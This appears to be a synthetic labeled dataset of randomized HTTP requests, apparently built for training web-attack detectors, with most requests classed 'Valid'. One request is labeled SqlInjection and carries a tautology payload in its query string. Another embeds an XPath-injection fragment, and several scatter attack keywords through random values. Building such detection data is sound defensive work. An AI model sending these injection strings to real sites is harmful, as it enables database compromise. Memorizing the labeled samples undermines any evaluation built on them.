GET /hTeeu2miHhiEi/obe4vnts.4NIn4@Dya.png?floeafkxienhfeC=eto&eqliet1leUf=3hd&KBGh=e3ee3r&0ernq9Hte=eaBouSpSGZlN&6etrohdreof8Tn=or+tq&1kOWV=5&Wsdteehaht=217199&3aptfagid1eclCg=874243&mOArxND=ruunionrt%5Cgce%2Bm%3EM%5Cxemn&dytptN=ehmvr%27%5D+++++%7C+P+%7C++%2F%2Fuser%5B+name%2Ftext%28+++%29+%3D+%27is HTTP/1.0
Host: 116.167.50.224
Connection: uinfaic
Accept: */*;q=0.6
Accept-Charset: euc-kr
Accept-Encoding: 
Accept-Language: 8sa4o-za8yy, WD9n-Nwle
Cache-Control: no-cache
Client-ip: 68.97.141.43
Cookie: aTygnhvjmoabe=9342679;ednrnuen3hwF=8gie;lhd=a0YCeH
Cookie2: $Version="890"
Date: Fri, 08 May 09 17:47:22 UTC
ETag: "Llo6Q0Dtf73F-LBFZWsG"
Expect: e8c6tipe
From: tgaZ6rhn@dneNoaa.uk
If-Modified-Since: Thu, 08 Oct 09 16:38:14 UTC
If-Unmodified-Since: Mon, 27 Apr 09 16:38:08 GMT
If-Match: "-OtePnzfOtfkoju"
If-None-Match: "pZxj2vYbu5TWpNRF1CjH"
If-Range: "1947u5Zn0GiwsfB"
Max-Forwards: 0084
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: Digest username="sudmt"
Authorization: Basic YWUwcjpIdE5tZTl5
Range: -5103
Referer: http://nmttml.st/rdvgeeZ/uokpaf.cfm
TE: chunked,trailers,deflate;q=0.4
Trailer: User-Agent
User-Agent: ledan (t2j9-AJ; eFqiZpLuOr; 4YC-2-PBo)
UA-CPU: x86
UA-Disp: 466,505,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 2667x788
Via: usna/0.3 www.stumf.jpeg, 7.6 www.htle0ei.gif:9
Transfer-Encoding: compress
Upgrade: pnarot/3.1, 7tgym/1.5
Warning: 250 95.244.16.100 "anwrZ" 
X-Forwarded-For: 214.86.27.10
X-Serial-Number: 24734
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 35670
Start - Id: 20052
class: Valid
GET /daspaidlc5ciun40/Wprocessing-instructionw/c.PnBQQaj8uUEx_/lJ.QWNjE5ogu.shtml?emtitteoas=eOSWzFgbL&9otdeorsuoteeN=967808&cocSidiAPoew=a_PgzjXZri&eiEqnrc6a2=159&sdxpd8d4a=diylevo5ae&lt=207&E8t1snmoersma4=37 HTTP/1.0
Host: www.ruhfR.gov
Connection: nouQh
Accept: video/*, image/gif;q=0.1, text/html
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=8398
Client-ip: 237.84.43.254
Cookie: h6srltuhN=3;uOtketersePmlw=ot;teeholp=nep0dr$sy;zT4w_=rxCtwpWo;merrrnr=int3Ds4T
Cookie2: $Version="357"
Date: Tue, 17 Apr 07 22:11:36 GMT
ETag: W/"U30aKkTU@mjGkdB"
Expect: ULdrle=mad0ney;378Afnr=gkuia1n5
From: co3eruq@a1tl7.com
If-Modified-Since: Wed, 11 Oct 06 15:18:31 GMT
If-Unmodified-Since: Tue, 14 Apr 09 17:42:24 CET
If-Match: *
If-None-Match: "Dbsywx6JI5E.DKSYM"
If-Range: Thu, 14 Oct 04 17:14:08 CET
Max-Forwards: 166
MIME-Version: 6.9
Pragma: tbnsi=k
Proxy-Authorization: Basic bUVsZnR0cjpqcTRE
Authorization: eutanj iooetlcn=natjsym
Range: -09642
Referer: http://oerRAts.cz/ej1rsra/udsiol/bmelt.gz
TE: deflate;q=0.8
Trailer: Max-Forwards
User-Agent: Mozilla/1.6 (X11; U; Open BSD i586 9.2; gd-sc; rv:7.1.1) Gecko/64359768
UA-CPU: PowerPC
UA-Disp: 6419,466,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 1108x908
Via: 6.4 10.38.103.141, 6.2 38.127.97.87
Transfer-Encoding: h3oHe; yCdnosi=qeorNplO
Upgrade: dnsdi/5.0
Warning: 265 209.55.224.78 "xohaflYta" 
X-Forwarded-For: 251.150.56.132
X-Serial-Number: 438818323
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20052
Start - Id: 2391
class: Valid
GET /tlqTnsjwt0hatoswCtri/ewbttt0o/AyV/cnzed/yhU/oNFZqJxMutHdCTXRt/y@Q31kj_R/6CnvR8c/uoRGpiAwDa.htm? HTTP/1.0
Host: 69.193.99.251
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: a-uhAt1, reAtliin-nitet, h1uk-8bttioau, hinFEypq-s9l7ts, ce-ewe5w4
Cache-Control: no-transform
Client-ip: 178.125.150.21
Cookie: jig=1057545
Cookie2: $Version="5"
Date: Mon, 28 Dec 09 01:08:21 CET
ETag: W/"mpEHy4PDd5XcQF2TnmRC"
Expect: Ouglr4mp
From: iait@a4anuwrew.it
If-Modified-Since: Thu, 15 Apr 04 23:01:01 GMT
If-Unmodified-Since: Mon, 28 Jun 04 18:14:10 CET
If-Match: "DNn8gr2-noV5ffuZ"
If-None-Match: "Lu6XlpwFDk.DyEy"
If-Range: Sun, 04 Apr 04 21:12:30 CET
Max-Forwards: 8
MIME-Version: 5.3
Pragma: tt='znk'
Proxy-Authorization: Digest response="32CC03ccCD2C4F02bb800C8DE1CCEbDB"
Authorization: Basic VWplcndUOnp0dGh1
Range: -6438,517-6840,630-69
Referer: http://www.ahss1i.org/oti3nh/nrhteap.gz
TE: gzip
Trailer: Accept-Charset
User-Agent: Mozilla/2.0 (compatible; Konqueror/1.3; Linux i586; zsmn)
UA-CPU: PowerPC
UA-Disp: 311,7575,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 3780x3384
Via: 2.8 39.225.167.44, FTP/5.0 205.54.18.253
Transfer-Encoding: compress
Upgrade: Faqoaa/2.4, A5ea/5.6, o3t/3.8, 0Enaeu/0.4, cwdo/6.3
Warning: 683 13.138.124.120:76 "gws9ddsc" 
X-Forwarded-For: 213.191.153.150
X-Serial-Number: 67775
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2391
Start - Id: 19464
class: Valid
GET /4k0YUHUsystemBK_ur/sSLn/su5.jpeg?afnbelrtStqit=fYil%28awinnt%3C&sseyo4e=272&Fd6tj=1937343&rscmsgitEH=bnxmlnulldt&NNbL9uYhQtG=f+a&md4Oggoc=n&li1oo3sps=76935658&oenmaaemvcaes=9616650596&QF4lsz36g=+O&QlEHnpformPrY=48&oluaEa8iortlgun=231&nhttpVUTW_7L=2160&KQMrq1NaJdp=agsnhu0TnmAprrBurE&xoitlgoi0g=npllem&oiobdNdaic=oexecdn5ohlIaEni HTTP/1.0
Host: www.qe0li6thee.uk:80
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: windows-1252;q=0.6, iso-8859-1;q=0.1, windows-1250
Accept-Encoding: identity;q=0.2, deflate;q=0.1, identity
Accept-Language: ctereet-sZf;q=0.3, ahton-m6tvm;q=0.3, zei9alu-gvHOb3u
Cache-Control: max-stale=12522
Client-ip: 101.98.75.185
Cookie: sgemO=485;ausd1ohztug=m;Het=69181;e7ur=fd;.0Ys=u?5 &%
Cookie2: $Version="363"
Date: Sun, 03 Aug 08 05:05:20 GMT
ETag: "2sxAmg2bScl7UvPP"
Expect: leieeu
From: onnnAm1I@spE2Fe0rns.com
If-Modified-Since: Thu, 10 Jul 08 11:24:23 GMT
If-Unmodified-Since: Thu, 03 May 07 02:22:43 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 29 May 08 18:54:50 GMT
Max-Forwards: 3
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: NTLM ZXlsMVRwcGhwczMxc29ubWVNc2VkZ2xlY2F0aW1lZTNy
Range: 201410-,-406227
Referer: /fres/eehd/ovllosc/ds5ho/Pag8e.dll
TE: deflate,trailers
Trailer: Accept-Language
User-Agent: Mozilla/2.1 (compatible; Konqueror/4.6; Win 9x; ruegt0Wksn; quTot3d)
UA-CPU: PowerPC
UA-Disp: 915,682,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 6480x436
Via: HTTP/2.2 145.128.187.41
Transfer-Encoding: identity
Upgrade: cICE/8.0
Warning: 833 139.253.101.46 "aPpebhw" "Sat, 11 Mar 06 14:51:53 UTC"
X-Forwarded-For: 229.29.101.243
X-Serial-Number: 219251362727568
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 19464
Start - Id: 1918
class: Valid
GET /enR4wVeIsVKG/omnf4e/duyenaSuw6mof.tiff? HTTP/1.0
Host: www.sek1a.org
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 168.31.1.79
Cookie: 4babtu06kaoeu=3496671853;hs=ls(NclatreA=bruimgsiauH;mnelc3=isoo8bede;7aEFdocumentS6-Umj=u;efd34Enno=oUte?tdugk1t
Cookie2: $Version="849"
Date: Mon, 10 May 04 18:40:53 GMT
ETag: "N7m6QVXHgIOiHQEzH"
Expect: 100-continue
From: irFtest@preu14.com
If-Modified-Since: Sat, 08 Jul 06 01:45:16 CET
If-Unmodified-Since: Mon, 02 May 05 24:42:42 UTC
If-Match: *
If-None-Match: "_oQ@a2AgkluB7fD"
If-Range: "53K@XN.9g_Ps6B_XL1b6"
Max-Forwards: 9375
MIME-Version: 9.0
Pragma: omwffco='ois'
Proxy-Authorization: Basic d0NpYjlsZTo2b2dxbnRl
Authorization: Digest opaque="eDhdEsoa"
Range: -56958,2-,8155-22511
Referer: http://etxe.biz/tteofTf.css
TE: trailers
Trailer: Pragma
User-Agent: aoeq1ndadm/6.3.6.0
UA-CPU: PowerPC
UA-Disp: 272,378,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 594x6031
Via: FTP/8.3 www.mzou.css:4233
Transfer-Encoding: compress
Upgrade: tso/5.4
Warning: 102 www.hneEues.jpeg "btfhb" "Sun, 22 Feb 09 12:17:30 UTC"
X-Forwarded-For: 18.94.37.60
X-Serial-Number: 127171974512233
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1918
Start - Id: 6151
class: Valid
PUT /DsoiRbhigxA/2el/eyptinav7tperOnh/r@fx/ehaUjz7Zfs8/reselzsoHIr6/itomiyoe/6YsrAm7r@update.shtml? HTTP/1.1
Content-Length: 178
Content-Language: uAtiaeu
Content-Encoding: gzip
Content-Location: http://www.utetcr1r.be/wKmar/dhreast.jpg
Content-MD5: aG9kbDFFYml2N25UYWFzaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 24 Jan 10 11:56:02 GMT
Last-Modified: Wed, 26 Jan 05 08:15:15 UTC
Host: www.aanSa9d.org:80
Connection: keep-alive
Accept: text/*, text/*, image/png
Accept-Charset: gb2312
Accept-Encoding: deflate, compress;q=0.9
Accept-Language: def1e-ir3;q=0.6, hhoea9Nd-iuf5nrut;q=0.0
Cache-Control: max-stale
Client-ip: 193.131.23.121
Cookie: mef0=5KJ0gjNhZj;Evffmelioo=n5;eussIg=rejhu;iusHXogixt2=nana
Cookie2: $Version="52"
Date: Fri, 16 Oct 09 24:06:30 UTC
ETag: W/"pq7cSOmHvWLSWCvL"
Expect: gbEoaHe=mbo4l
From: arnac8@nERnnE.be
If-Modified-Since: Mon, 02 Mar 09 09:43:02 UTC
If-Unmodified-Since: Thu, 29 Jan 04 04:20:30 CET
If-Match: *
If-None-Match: "x4WVGBV75HqYCqKbYAOU"
If-Range: Mon, 23 Jul 07 02:37:07 GMT
Max-Forwards: 7
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Basic MUV6bGVxOlZhZmF5c3Ji
Authorization: ettpre Oeat=7dtf2s
Range: 611533-,1458-075
Referer: /fhud/tdcc/elmtye/iy5ccss.txt
TE: chunked;q=0.0,trailers
Trailer: Upgrade
User-Agent: 3tun (yosy4.b; jq0cWYKN)
UA-CPU: StrongARM
UA-Disp: 8680,157,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 0700x717
Via: HTTP/8.5 177.106.151.10
Transfer-Encoding: deflate
Upgrade: pwlrab/6.6
Warning: 194 www.xmkm27h.jpg "hyeTpth" 
X-Forwarded-For: 175.130.165.6
X-Serial-Number: 9298253900687
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

Xc7fD67zTw=98104&nasldtnre=OrBiframetgph1&ktt2qO2tv5hov=7062&tee8ea=htaccesiusr&tNhsawNyd1=yWBCsWQzg&aer4y=w&>?0 ihS0 s&K6ZGv0QU=taG549yjXny&cAri=Eoh&s6p1se4ag=rV1GSkMyo@

End - Id: 6151
Start - Id: 2478
class: Valid
GET /umear/fzEfx3Uz9eR/zsHoAa9GorsIEhnpel3d/aHpJit126LqTZQZW/dGIlFxv0/ioastqenvnnse/gx/ebdatty4ilneJwcriy/ekxE3mLd4gYmdF08/8kudfoslbeio/i11HekzOVuMimre.js? HTTP/1.1
Host: www.oiii.gov:8205
Connection: close
Accept: audio/*;q=0.5, application/*;q=0.2, image/*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: utittaua-nL;q=0.3, saeo-knHeq, N7a-touiiies
Cache-Control: Tt=ynCq
Client-ip: 100.174.188.163
Cookie: n8o=t|;4YG96P16Ch=lQE;ocYomlh=duam3m53eo;lL4pYlib3G= vOea2mssd;diq=izo1;sdzmsg=52
Cookie2: $Version="05"
Date: Sun, 14 Oct 07 03:30:31 CET
ETag: "lEZyoKqlTPQHPXajV4m"
Expect: 100-continue
From: lwr9lmn@nibin9U3.biz
If-Modified-Since: Mon, 11 Dec 06 19:55:12 GMT
If-Unmodified-Since: Sun, 16 Aug 09 24:59:46 CET
If-Match: *
If-None-Match: "sAIEA1D1F7wdtTlmuA"
If-Range: "nLwb_M@UEA8aW7J"
Max-Forwards: 8
MIME-Version: 6.6
Pragma: ooQwqo='z'
Proxy-Authorization: aO8f iuk3ebu6=enntrr
Authorization: Basic cm5idDpidGRscg==
Range: 0555-2,778762-,232388-
Referer: /Nlsh/tytt/iBDu.html
TE: deflate;q=0.8
Trailer: Date
User-Agent: Mozilla/5.1 (compatible; MSIE 5.4; Mac OS X; 0EyYp)
UA-CPU: x86
UA-Disp: 667,797,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 392x1193
Via: 2.8 www.1r1AewD.htm, 9.9 www.ie9i.js:06429
Transfer-Encoding: compress
Upgrade: Hslrot/3.2, nPdtaa/1.1
Warning: 552 www.tsng.jpg:1 "tsmt879qcdlEstelgpx" "Wed, 23 Nov 05 20:06:09 UTC"
X-Forwarded-For: 213.191.153.150
X-Serial-Number: 347745233258688600
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2478
Start - Id: 12534
class: Valid
GET /2ebdmzee2m19n.css?9i=e&oSietsdcpi=n%26r7oeIF47&ue7mnxnni3=ngoegeoasartel&walrtelnkh=wxSXh&8cwae=aEltmp1oece&ei4qeSatmwe7Hr=eyhtrnWSw7wmlhf&orlexsoemsgsi=eskeh+&edn9insowykEatt=71067&vBmQMRHWY=30813&4vdivHBJ5w6=62&0aowits0fNTb=4762&xLWWwV=+8dspie1rd%3Cssk&gaireiahisccwle=at+oustdinOb%40%271woi HTTP/1.0
Host: www.ru9mdg0Hi.st
Connection: hm7vk
Accept: image/gif, image/*
Accept-Charset: x-mac-roman, iso-8859-4;q=0.4, x-mac-ce;q=0.4
Accept-Encoding: identity
Accept-Language: *;q=0.5
Cache-Control: max-stale=39
Client-ip: 33.100.30.116
Cookie: twauI=78;Noi=agoInodewnjeTrsioafm~>;ylUThnnel=(tadmintuqad9oopen
Cookie2: $Version="086"
Date: Sat, 14 May 05 11:40:08 CET
ETag: "dRpCqRyMcTgVU0M8z"
Expect: sedlo=irnMm
From: Prazsf@rlxeoeonc.fr
If-Modified-Since: Sun, 11 Jun 06 13:39:50 UTC
If-Unmodified-Since: Mon, 24 Dec 07 02:18:50 CET
If-Match: *
If-None-Match: "@3YGWBvamusZr.U6w3S"
If-Range: Sun, 31 May 09 08:13:19 UTC
Max-Forwards: 4291
MIME-Version: 3.3
Pragma: aD='di'
Proxy-Authorization: NTLM RXRldGRubnluMnZoNDNlZWlpZGNidG9pb3RhY2xGZ2k=
Authorization: Basic YXRvZHZvOmFSdW5wYg==
Range: 79521-822865,4-
Referer: http://www.nNcoL0cd.biz/ey8e/nolT.swf
TE: trailers,trailers,trailers
Trailer: Authorization
User-Agent: w5zc/2.1.2
UA-CPU: PowerPC
UA-Disp: 3658,3398,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 580x349
Via: 9.9 112.116.113.230, 6.6 www.nmax.htm, 1.1 201.55.241.211
Transfer-Encoding: gzip
Upgrade: AGSes/3.1
Warning: 009 www.ecnv.tiff "tiind6peciKeh3" 
X-Forwarded-For: 134.103.218.48
X-Serial-Number: 2197491883894
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12534
Start - Id: 23171
class: Valid
GET /ynfodhh7ceis/s5fdeMbjmP_RLD/lhkDq8Ex8p1HPk@/G2NQHy/hX6K_RHeXCQe/MUD7B/-1CmI/iL8/cV@NJk-.cgi? HTTP/1.1
Host: 142.61.20.137
Connection: euoGv
Accept: text/*
Accept-Charset: x-mac-cyrillic
Accept-Encoding: deflate, deflate;q=0.4, deflate
Accept-Language: *
Cache-Control: min-fresh=96
Client-ip: 86.43.140.192
Cookie: arrtteida=93613957;8rmq1=38;iihoi=afpln;Dd2eu4connect=0te6rogSeaar%4;Ghheory@G91Y=9tl;srqn= rd2nosoi[wkecbgmocha
Cookie2: $Version="498"
Date: Sun, 19 Jul 09 17:37:10 GMT
ETag: W/"EQvmylPqDP6@n8j@fVs"
Expect: 100-continue
From: ytscaT@osoeia.cz
If-Modified-Since: Thu, 24 Apr 08 23:01:50 CET
If-Unmodified-Since: Tue, 26 Dec 06 22:19:46 GMT
If-Match: "nGsXW@sy@1DbFGis6kFF"
If-None-Match: *
If-Range: Sat, 10 Dec 05 14:02:13 CET
Max-Forwards: 83
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: ariihf uAaec=elRxHnr
Authorization: Iosb meezast=esTeeEt
Range: -362684,26-
Referer: http://www.tsnSth.st/trtditee/nuxheou.css
TE: gzip;q=0.8,trailers
Trailer: If-Unmodified-Since
User-Agent: fIiu_5 http://www.iysfyey.de
UA-CPU: PowerPC
UA-Disp: 519,575,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 955x1403
Via: HTTP/0.4 229.80.62.23
Transfer-Encoding: deflate
Upgrade: aeo6t/4.4, matg/8.3, 0dn/5.9, uoO/0.4
Warning: 412 www.Fsjawe.gif "ecfj" 
X-Forwarded-For: 175.124.77.138
X-Serial-Number: 76690909
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 23171
Start - Id: 2081
class: Valid
GET /mKqiO/Worsle7Uoefdtje/ueol7nekdFnwfEgpC/ciYF9mY4JXVD1/a.ef8t/HHzmC/X7DGPmA.mdeBoQ4/sje9idr.jpg?RE7sfC8IC=elaodqosto9 HTTP/1.1
Host: 166.73.69.191
Connection: rbw8rt
Accept: video/quicktime, video/*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: vhT-lq;q=0.5, nqlewt-egrT;q=0.8, heblrel-sb;q=0.4
Cache-Control: max-age=00
Client-ip: 226.99.48.187
Cookie: whvinsert4081hgU=cmrde;oxo8dairrs=lese3dmeta8caccess_log;zO22o=n;e1-tenne1r
Cookie2: $Version="71"
Date: Sun, 08 May 05 08:02:03 GMT
ETag: W/"OYtbSdFPKASQFidRef"
Expect: nttmlu
From: Iosu@aert5hd.ch
If-Modified-Since: Mon, 19 Mar 07 19:03:15 CET
If-Unmodified-Since: Fri, 03 Jul 09 04:01:18 GMT
If-Match: "aXB6LNuLzFqqz8O"
If-None-Match: *
If-Range: "0upnEt-ivAEz_AxWaO-"
Max-Forwards: 22
MIME-Version: 8.5
Pragma: sobhfro='edgjde'
Proxy-Authorization: Basic bDU0RTVvcjphZWEwdA==
Authorization: NTLM dGFvYXRjYXVuZXR2bnBhaWdzaGVveXRyb284bE1jczdsZXJzNQ==
Range: -057481,324566-108,947493-06192
Referer: http://www.hSeAaa.org/2eo7/a07anmh/llorpmim.mpg
TE: trailers,gzip
Trailer: TE
User-Agent: be7risemiz/8.1
UA-CPU: StrongARM
UA-Disp: 4115,383,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 9053x775
Via: itxiol/8.3 www.slraso0.js, ewCzth/9.3 www.rihh3tjg.jpg
Transfer-Encoding: tlvs; uwvla=rSdhfsee
Upgrade: hli/9.0
Warning: 818 177.52.40.0:7 "eese0qtmam" "Thu, 12 Nov 09 18:55:16 GMT"
X-Forwarded-For: 108.113.52.240
X-Serial-Number: 0933416903549
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2081
Start - Id: 21319
class: Valid
GET /WpB/exL.ATmamG/9TvQucUMQ/rbk9NQQFe@fh._Z/rIu6xFP/eqwM.9v@kTS/aQ6FdcfI/Land1%uCinclude65DS5cGT.swf? HTTP/1.1
Host: 208.247.73.159
Connection: keep-alive
Accept: audio/*, video/*
Accept-Charset: iso-8859-7, x-mac-hebrew
Accept-Encoding: *
Accept-Language: valhib-i1csorIl, E-otLfXr, iee-i
Cache-Control: asnE2k9='rhf6'
Client-ip: 107.104.243.184
Cookie: ebwzeb1o=+e;s8dpe5e=12Hslr
Cookie2: $Version="961"
Date: Sat, 21 Oct 06 15:16:11 UTC
ETag: W/"IQJsIMI22abw@jqAOO"
Expect: erdoHdf3=esho
From: o5HiaS@s5aAas.st
If-Modified-Since: Mon, 19 Nov 07 09:18:23 UTC
If-Unmodified-Since: Sun, 17 May 09 21:51:01 UTC
If-Match: *
If-None-Match: "Al@SE_s1vPUXXDznO"
If-Range: Sun, 17 Feb 08 10:26:39 GMT
Max-Forwards: 3
MIME-Version: 6.0
Pragma: ad=rfn
Proxy-Authorization: Digest opaque="o6eeA"
Authorization: Basic cmhudFkxaEE6ZWFzZXF0bmk=
Range: 863-
Referer: /aacC/O2ivtOo.cfm
TE: trailers,deflate,trailers
Trailer: Accept
User-Agent: Mozilla/5.1 (Windows; U; Windows NT 0.4; rn-Ed; rv:0.2.6) Gecko/60826506
UA-CPU: PowerPC
UA-Disp: 406,021,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 6998x4175
Via: FTP/2.7 www.aaiNtlf.js, 6.7 86.11.22.118, 2.8 40.237.110.99
Transfer-Encoding: compress
Upgrade: Cfm/0.1
Warning: 371 www.eesb7.jpeg "lhwt" "Wed, 24 Sep 08 21:43:43 GMT"
X-Forwarded-For: 145.243.54.100
X-Serial-Number: 2418413
----: -------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 21319
Start - Id: 526
class: Valid
GET /hsiufr/ilF9OKS8zhRpQh4pH/wetcO/rAo/eprTipsshiOaie/e4LOYdg/hnqPWdYQ/uKMYmDkUEUkYm7_/NeeeToe6atxtt2t/9QOer/drsidcjr3hfo3/sypmcsilpe9dljhUaE.jpeg?wlnpev7Nhegg=rftpae1&aynph-Os=cheO&9nSsa0qbsuhip=8pOZ9.SKAL&40vn=0879&QqUHLQp_=nonhScrmhjodte&Ri2t5fpn=f%3Bservicesboot.inic&towexnbahUmhs=5738 HTTP/1.1
Host: 86.160.136.85:80
Connection: keep-alive
Accept: */*
Accept-Charset: koi8-r;q=0.0, ks_c_5601-1987;q=0.4, x-mac-hebrew;q=0.0, iso-2022-kr
Accept-Encoding: 
Accept-Language: *
Cache-Control: n8oo=pxexoRsp
Client-ip: 35.158.185.35
Cookie: wcceeswiheh=daakkhmd9nniet2;oe=dtooOqcmd=iZ;orewE=e'~l
Cookie2: $Version="17"
Date: Mon, 14 Dec 09 04:48:16 CET
ETag: "9JR9pxSj6AY@sD6us@U"
Expect: dboav
From: Ru2z@lmhsqeaaEt.gov
If-Modified-Since: Tue, 02 May 06 10:17:12 UTC
If-Unmodified-Since: Tue, 07 Mar 06 04:09:04 UTC
If-Match: "7QEl@HnCqrOskLL"
If-None-Match: "opYflFOVH-94bHI"
If-Range: Tue, 04 Nov 08 05:06:02 UTC
Max-Forwards: 98
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: 6muw eomas=dln2
Range: 016-,6116-156945
Referer: http://ee0e.uk/aene/r3Po/taqr/4oap/hs3dNym2.pl
TE: trailers
Trailer: Range
User-Agent: Mozilla/0.4 (compatible; Konqueror/6.1; Linux i386; Whseaaxni; itntdh7a; g5akmt)
UA-CPU: StrongARM
UA-Disp: 156,7636,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 425x931
Via: 4.4 www.whtpc.css, HTTP/3.4 www.sttgk.shtml
Transfer-Encoding: compress
Upgrade: hm4tsE/7.7, sngi/4.9, b9nhx/5.1
Warning: 031 173.215.193.129 "koSnmyiqOdiUot" "Fri, 03 Apr 09 01:48:11 UTC"
X-Forwarded-For: 2.115.5.51
X-Serial-Number: 35520
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 526
Start - Id: 35428
class: SqlInjection
GET /c2wFq.html?bUHQH7timg=mPX5P6gxDoz&rr=OR+++6809540497%3D6809540497&hnctl=sidmbc&erfKsoelr2=53691103&group byIo3DeRrmDb=14613&PAY6B5Xperl=cB2gwj&lyOx=027 HTTP/1.1
Host: www.nrejs.it
Connection: close
Accept: application/*, application/*;q=0.7
Accept-Charset: *;q=0.5
Accept-Encoding: deflate, identity;q=0.1, compress, gzip, identity
Accept-Language: Tsai-in;q=0.9, tss2-trne;q=0.9, 8-ik2tudae;q=0.1, iy-6, ipehaXd-pn
Cache-Control: min-fresh=141
Client-ip: 185.9.17.112
Cookie: u8snziOdel=gr7bicbuwi6GTfagpd;GpsjJnin=hIrfG;5fxlog72Du=oiyrn;indoaironryt=767;sCrntsfxtsfepb=hwhere>eo;ss=NieiueadDdoxtya9
Date: Sun, 31 May 09 06:55:10 UTC
ETag: "xs@3tPvr8T.jKwZ7M6C"
Expect: 100-continue
From: wgttuate@lrahn.uk
If-Modified-Since: Tue, 03 Jun 08 13:02:12 CET
If-Unmodified-Since: Wed, 14 Jan 09 04:44:55 CET
If-Match: *
If-None-Match: *
If-Range: "r@1bfIIiOX1_k1qKLf"
Max-Forwards: 804
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: NTLM ZWllYWFub2lSc3Nyc21VbnJwYWVtZWNudWF1dU56MW90d3BvbGhhdWNh
Authorization: Basic bzJoa21naWU6YUdudHlt
Range: 1117-95,491-
Referer: http://www.2N8o.com/tertiv8i/stec/oiasgiDs/sgo0Erdr.html
Trailer: TE
User-Agent: Mozilla/2.5 (compatible; Konqueror/2.6; SunOS sun4u; oigf; 4rC0anpjW; ee6cfE)
UA-OS: Linux
UA-Color: color8
UA-Pixels: 4231x7309
Via: HTTP/6.7 www.7ebIuytw.html:7, 7.8 214.92.155.217
Transfer-Encoding: identity
Upgrade: a1uoii/9.3, 2Nnr06/6.4
Warning: 213 www.ha181.png "anao" "Fri, 28 Dec 07 24:10:22 UTC"
X-Forwarded-For: 115.143.230.10
X-Serial-Number: 323144017545
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35428
Start - Id: 3362
class: Valid
GET /rregciRtfr/ebneAeas/eiueddk/t63ql/gzvne8eSEdenfdaoihdk/cNwnnvffisrec/iTvFSWM67TEy2HZNTDr/0rVANcH/uoyweeTfou9teN/1d/cncwtgaA5cre3nsAC4ko/d1hCwlll.js?trOp=ehnhpJdIctnR&2srCpN8BtF=57805 HTTP/1.0
Host: www.Tngspoi59.com
Connection: keep-alive
Accept: application/x-tar;q=0.5, image/*;q=0.9
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: Tob-e, y-tle;q=0.9, i-tYrioacs, aye6t7-sncs, ieuoasq-8t
Cache-Control: no-store
Client-ip: 241.173.41.168
Cookie: l1n=niaccess_log3oci;cmeyR4Rqcch=Ece;ori=uAAKKM;aT=dpehpun;solme= ;imnsgesC=nu
Cookie2: $Version="60"
Date: Fri, 02 May 08 03:47:53 UTC
ETag: W/"Wuorz4v88C6@85w"
Expect: 100-continue
From: rotrm@prr0Uaen9A.net
If-Modified-Since: Wed, 07 Mar 07 14:13:31 UTC
If-Unmodified-Since: Sat, 19 Nov 05 05:10:52 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 26 Sep 09 14:47:49 UTC
Max-Forwards: 7610
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Basic b3Fhb3I6ZVppdGU=
Authorization: NTLM b3RvcG5lcm1lemk2aXNtb3J0ZW5uYWVyZmxpdGJueXJlbkVucmRoaWlveG1taGdj
Range: -8,28-271041
Referer: /5nqie/6qfauec/Tr0Bxm/bhmpuyL/n4e9h.php
TE: trailers,trailers
Trailer: Referer
User-Agent: Mozilla/8.9 (Machintosh; U; PPC Mac OS X 3.1; ui-ot; rv:6.0.6) Gecko/54509711
UA-CPU: x86
UA-Disp: 351,552,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 8795x2718
Via: HTTP/0.3 57.39.212.80, HTTP/0.3 www.kdaFaxnt.js
